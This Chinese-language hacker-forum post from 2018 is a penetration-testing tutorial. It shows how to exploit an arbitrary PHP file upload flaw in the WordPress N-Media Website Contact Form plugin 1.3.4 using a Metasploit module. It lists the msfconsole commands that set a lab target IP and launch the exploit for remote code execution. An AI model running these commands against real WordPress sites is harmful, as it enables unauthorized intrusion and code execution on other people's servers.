渗透测试实战:WordPress N-Media网站联系表格插件存在文件上传漏洞【附上利用方法】

zevseo
3740zevseo大版主
2018-09-11 02:48:50
3740 2018-09-11 02:48:50
此模块利用WordPress N-Media网站联系表单插件1.3.4版中的任意PHP代码文件上传。该漏洞允许任意文件上传和远程代码执行(RFI)。
利用目标
WordPress N-Media网站联系方式表单插件1.34
需求
攻击者:kali Linux
受害者PC:已安装WordPress
打开Kali终端类型  msfconsole

描述:WordPress N-Media网站联系表格插件存在文件上传漏洞


现在输入  exploit use / unix / webapp / wp_nmediawebsite_file_upload
msf exploit (wp_nmediawebsite_file_upload)>set targeturi http://192.168.0.110/wordpress
msf exploit (wp_nmediawebsite_file_upload)>set rhost 192.168.0.110 (远程主机的ip)
msf exploit (wp_nmediawebsite_file_upload)>set rport 80
msf exploit (wp_nmediawebsite_file_upload)>exploit
WordPress N-Media网站联系表格插件存在文件上传漏洞

描述:WordPress N-Media网站联系表格插件存在文件上传漏洞


本文标题:渗透测试实战:WordPress N-Media网站联系表格插件存在文件上传漏洞【附上利用方法】
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2313.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan